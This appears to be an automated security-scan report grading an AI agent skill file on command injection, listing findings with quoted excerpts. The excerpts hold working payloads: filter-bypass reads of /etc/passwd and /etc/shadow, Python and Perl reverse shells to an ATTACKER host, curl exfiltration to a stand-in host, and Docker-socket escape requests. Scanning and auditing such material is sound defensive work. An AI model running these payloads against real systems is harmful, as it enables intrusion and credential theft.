cmdi-command-injection

https://raw.githubusercontent.com/yaklang/hack-skills/main/skills/cmdi-command-injection/SKILL.md

github.com/yaklang/hack-skills

Scanned Thu, 28 May 2026 17:26:03 GMT

Scan ID crawl-xqbnqe4g7f2mcp034tyvfm19 · 5ms

SCORE 55 / 100

Verdict: Proceed with caution

43 high-severity findings.

This skill reads protected filesystem locations ($IFS) plus 52 other issues listed below.

0 critical43 high10 medium-41 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 43 high-severity findings (3+ HIGHs → C).

0 CRIT43 HIGH10 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 41 of 43 HIGH (cap is 2) + 5 of 10 MED (cap is 5).
A
Reach Atarget score 95
Resolve all 43 HIGH + 8 of 10 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 28CWE-552

▾

27```text

28cat$IFS/etc/passwd← sensitive path — credential-exfiltration vector

29{cat,/etc/passwd}

30%0aid

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 29CWE-552

▾

27```text

28cat$IFS/etc/passwd

29{cat,/etc/passwd}← sensitive path — credential-exfiltration vector

30%0aid

31```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 50CWE-552

▾

48| `>` | Redirect stdout to file | `cmd > /tmp/out` |

49| `>>` | Append to file | `cmd >> /tmp/out` |

50| `<` | Read file as stdin | `cmd < /etc/passwd` |← sensitive path — credential-exfiltration vector

51| `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` |

52| `%0d%0a` | CRLF | Multi-command injection |

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 62CWE-552

▾

60$dir = $_GET['dir'];

61$out = shell_exec("du -h /var/www/html/" . $dir);

62// Inject: dir=../ ; cat /etc/passwd← sensitive path — credential-exfiltration vector

63// Inject: dir=../ $(cat /etc/passwd)

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 63CWE-552

▾

61$out = shell_exec("du -h /var/www/html/" . $dir);

62// Inject: dir=../ ; cat /etc/passwd

63// Inject: dir=../ $(cat /etc/passwd)← sensitive path — credential-exfiltration vector

65exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd"

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 65CWE-552

▾

63// Inject: dir=../ $(cat /etc/passwd)

65exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd"← sensitive path — credential-exfiltration vector

66system("convert " . $file); // ImageMagick RCE

67passthru("nslookup " . $host); // $host = "x.com; id"

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 89CWE-552

▾

87$command = "du -h /var/www/html" . $dir;

88system($command);

89// Inject dir field: | cat /etc/passwd← sensitive path — credential-exfiltration vector

90```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 177CWE-552

▾

175```bash

176cat /var/log/INJECT

177# Inject: ../../../etc/passwd (path traversal)← sensitive path — credential-exfiltration vector

178# Inject: access.log; id (command injection)

179```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 190CWE-552

▾

188; whoami # user name

189; uname -a # OS info

190; cat /etc/passwd # user list← sensitive path — credential-exfiltration vector

191; cat /etc/shadow # password hashes (if root)

192; ls /home/ # home directories

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 191CWE-552

▾

189; uname -a # OS info

190; cat /etc/passwd # user list

191; cat /etc/shadow # password hashes (if root)← sensitive path — credential-exfiltration vector

192; ls /home/ # home directories

193; env # environment variables (DB creds, API keys!)

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 232CWE-552

▾

230### Space Alternatives (when space is filtered)

231```bash

232cat</etc/passwd # < instead of space← sensitive path — credential-exfiltration vector

233{cat,/etc/passwd} # brace expansion

234cat$IFS/etc/passwd # $IFS variable (field separator)

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 233CWE-552

▾

231```bash

232cat</etc/passwd # < instead of space

233{cat,/etc/passwd} # brace expansion← sensitive path — credential-exfiltration vector

234cat$IFS/etc/passwd # $IFS variable (field separator)

235X=$'\x20'&&cat${X}/etc/passwd # hex encoded space

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 234CWE-552

▾

232cat</etc/passwd # < instead of space

233{cat,/etc/passwd} # brace expansion

234cat$IFS/etc/passwd # $IFS variable (field separator)← sensitive path — credential-exfiltration vector

235X=$'\x20'&&cat${X}/etc/passwd # hex encoded space

236```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 235CWE-552

▾

233{cat,/etc/passwd} # brace expansion

234cat$IFS/etc/passwd # $IFS variable (field separator)

235X=$'\x20'&&cat${X}/etc/passwd # hex encoded space← sensitive path — credential-exfiltration vector

236```

237

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 246CWE-552

▾

244### Keyword Bypass via Variable Assembly

245```bash

246a=c;b=at;c=/etc/passwd; $a$b $c # 'cat /etc/passwd'← sensitive path — credential-exfiltration vector

247c=at;ca$c /etc/passwd # cat

248```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 247CWE-552

▾

245```bash

246a=c;b=at;c=/etc/passwd; $a$b $c # 'cat /etc/passwd'

247c=at;ca$c /etc/passwd # cat← sensitive path — credential-exfiltration vector

248```

249

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 303CWE-552

▾

301```bash

302# Use ? and * to bypass keyword filters:

303/???/??t /???/p??s?? # /bin/cat /etc/passwd← sensitive path — credential-exfiltration vector

304/???/???/????2 *.php # /usr/bin/find2 *.php (approximate)

305

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 314CWE-552

▾

312

313```bash

314tac /etc/passwd # reverse cat← sensitive path — credential-exfiltration vector

315nl /etc/passwd # numbered lines

316head /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 315CWE-552

▾

313```bash

314tac /etc/passwd # reverse cat

315nl /etc/passwd # numbered lines← sensitive path — credential-exfiltration vector

316head /etc/passwd

317tail /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 316CWE-552

▾

314tac /etc/passwd # reverse cat

315nl /etc/passwd # numbered lines

316head /etc/passwd← sensitive path — credential-exfiltration vector

317tail /etc/passwd

318more /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 317CWE-552

▾

315nl /etc/passwd # numbered lines

316head /etc/passwd

317tail /etc/passwd← sensitive path — credential-exfiltration vector

318more /etc/passwd

319less /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 318CWE-552

▾

316head /etc/passwd

317tail /etc/passwd

318more /etc/passwd← sensitive path — credential-exfiltration vector

319less /etc/passwd

320sort /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 319CWE-552

▾

317tail /etc/passwd

318more /etc/passwd

319less /etc/passwd← sensitive path — credential-exfiltration vector

320sort /etc/passwd

321uniq /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 320CWE-552

▾

318more /etc/passwd

319less /etc/passwd

320sort /etc/passwd← sensitive path — credential-exfiltration vector

321uniq /etc/passwd

322rev /etc/passwd | rev

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 321CWE-552

▾

319less /etc/passwd

320sort /etc/passwd

321uniq /etc/passwd← sensitive path — credential-exfiltration vector

322rev /etc/passwd | rev

323xxd /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 322CWE-552

▾

320sort /etc/passwd

321uniq /etc/passwd

322rev /etc/passwd | rev← sensitive path — credential-exfiltration vector

323xxd /etc/passwd

324strings /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 323CWE-552

▾

321uniq /etc/passwd

322rev /etc/passwd | rev

323xxd /etc/passwd← sensitive path — credential-exfiltration vector

324strings /etc/passwd

325od -c /etc/passwd

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 324CWE-552

▾

322rev /etc/passwd | rev

323xxd /etc/passwd

324strings /etc/passwd← sensitive path — credential-exfiltration vector

325od -c /etc/passwd

326base64 /etc/passwd # then decode offline

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 325CWE-552

▾

323xxd /etc/passwd

324strings /etc/passwd

325od -c /etc/passwd← sensitive path — credential-exfiltration vector

326base64 /etc/passwd # then decode offline

327```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 326CWE-552

▾

324strings /etc/passwd

325od -c /etc/passwd

326base64 /etc/passwd # then decode offline← sensitive path — credential-exfiltration vector

327```

328

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 366CWE-552

▾

364```bash

365# $IFS (Internal Field Separator) as space:

366cat$IFS/etc/passwd← sensitive path — credential-exfiltration vector

367cat${IFS}/etc/passwd

368

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 367CWE-552

▾

365# $IFS (Internal Field Separator) as space:

366cat$IFS/etc/passwd

367cat${IFS}/etc/passwd← sensitive path — credential-exfiltration vector

368

369# Unset variables expand to empty:

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 370CWE-552

▾

368

369# Unset variables expand to empty:

370c${x}at /etc/passwd # $x is unset → "cat"← sensitive path — credential-exfiltration vector

371```

372

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 464CWE-552

▾

462#EXT-X-MEDIA-SEQUENCE:0

463#EXTINF:10.0,

464concat:http://attacker.com/header.txt|file:///etc/passwd← sensitive path — credential-exfiltration vector

465#EXT-X-ENDLIST

466

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 489CWE-552

▾

487# Classic injection point in network diagnostic features:

488# Input: 127.0.0.1; id

489# Input: 127.0.0.1 && cat /etc/passwd← sensitive path — credential-exfiltration vector

490# Input: `id`.attacker.com (DNS exfil via backtick)

491# These features directly call OS commands with user input

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 565CWE-552

▾

564|--------|-----------|-----------|-----------|

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 594CWE-552

▾

592

593# Injection via user input in command

594USER_INPUT='"; cat /etc/passwd; echo "'← sensitive path — credential-exfiltration vector

595→ kubectl exec pod -- /bin/sh -c "echo ""; cat /etc/passwd; echo """

596```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 595CWE-552

▾

593# Injection via user input in command

594USER_INPUT='"; cat /etc/passwd; echo "'

595→ kubectl exec pod -- /bin/sh -c "echo ""; cat /etc/passwd; echo """← sensitive path — credential-exfiltration vector

596```

597

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 609CWE-552

▾

607

608# Injection via command argument

609COMMAND="status; cat /etc/shadow"← sensitive path — credential-exfiltration vector

610→ docker exec container /bin/sh -c "status; cat /etc/shadow"

611```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 610CWE-552

▾

608# Injection via command argument

609COMMAND="status; cat /etc/shadow"

610→ docker exec container /bin/sh -c "status; cat /etc/shadow"← sensitive path — credential-exfiltration vector

611```

612

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 618CWE-552

▾

616# Docker socket exposed (2375/2376 or /var/run/docker.sock)

617POST /containers/create HTTP/1.1

618{"Image":"alpine","Cmd":["/bin/sh","-c","cat /host/etc/shadow"],"Binds":["/:/host"]}← sensitive path — credential-exfiltration vector

619

620# Then start + exec

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 622CWE-552

▾

620# Then start + exec

621POST /containers/{id}/start

622POST /containers/{id}/exec {"Cmd":["cat","/host/etc/shadow"]}← sensitive path — credential-exfiltration vector

623

624# Kubernetes API (6443/8443 unauthenticated)

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 652CWE-552

▾

650| `ENV` | Same as BASH_ENV for POSIX `sh` | `ENV=/tmp/evil.sh` |

651| `PROMPT_COMMAND` | Executed before each interactive prompt | `PROMPT_COMMAND="curl http://atk.com/$(whoami)"` |

652| `PS1` | Prompt string, supports `$()` expansion in bash | `PS1='$(cat /etc/passwd > /tmp/out) \$ '` |← sensitive path — credential-exfiltration vector

653| `PYTHONSTARTUP` | Python script executed on interpreter startup | Inject path to malicious `.py` file |

654| `PERL5OPT` | Options passed to every Perl invocation | `PERL5OPT='-Mbase;system("id")'` |

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 65CWE-78

▾

63// Inject: dir=../ $(cat /etc/passwd)

65exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd"← spawns a subprocess outside declared capabilities

66system("convert " . $file); // ImageMagick RCE

67passthru("nslookup " . $host); // $host = "x.com; id"

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 73CWE-78

▾

71```python

72import os

73os.system("curl " + url) # url = "x.com; id"← spawns a subprocess outside declared capabilities

74subprocess.call("ls " + path, shell=True) # shell=True is the key vulnerability

75os.popen("ping " + host)

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 74CWE-78

▾

72import os

73os.system("curl " + url) # url = "x.com; id"

74subprocess.call("ls " + path, shell=True) # shell=True is the key vulnerability← spawns a subprocess outside declared capabilities

75os.popen("ping " + host)

76```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 80CWE-78

▾

78### Node.js

79```javascript

80const { exec } = require('child_process');← spawns a subprocess outside declared capabilities

81exec('ping ' + req.query.host, ...); // host = "x.com; id"

82```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 81CWE-78

▾

79```javascript

80const { exec } = require('child_process');

81exec('ping ' + req.query.host, ...); // host = "x.com; id"← spawns a subprocess outside declared capabilities

82```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 207CWE-78

▾

205

206# Python:

207; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'← spawns a subprocess outside declared capabilities

208

209# Netcat (with -e):

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 216CWE-78

▾

214

215# Perl:

216; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'← spawns a subprocess outside declared capabilities

217```

218

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 377CWE-78

▾

375## 10. PHP disable_functions BYPASS PATHS

376

377When `system()`, `exec()`, `shell_exec()`, `passthru()`, `popen()`, `proc_open()` are all disabled:← spawns a subprocess outside declared capabilities

378

379### Path 1: LD_PRELOAD + mail()/putenv()

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 478CWE-78

▾

476 "script_fields": {

477 "cmd": {

478 "script": "Runtime rt = Runtime.getRuntime(); rt.exec('id')"← spawns a subprocess outside declared capabilities

479 }

480 }

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

Scan another →Share

skillox.io/r/crawl-xqbnqe4g7f2mcp034tyvfm19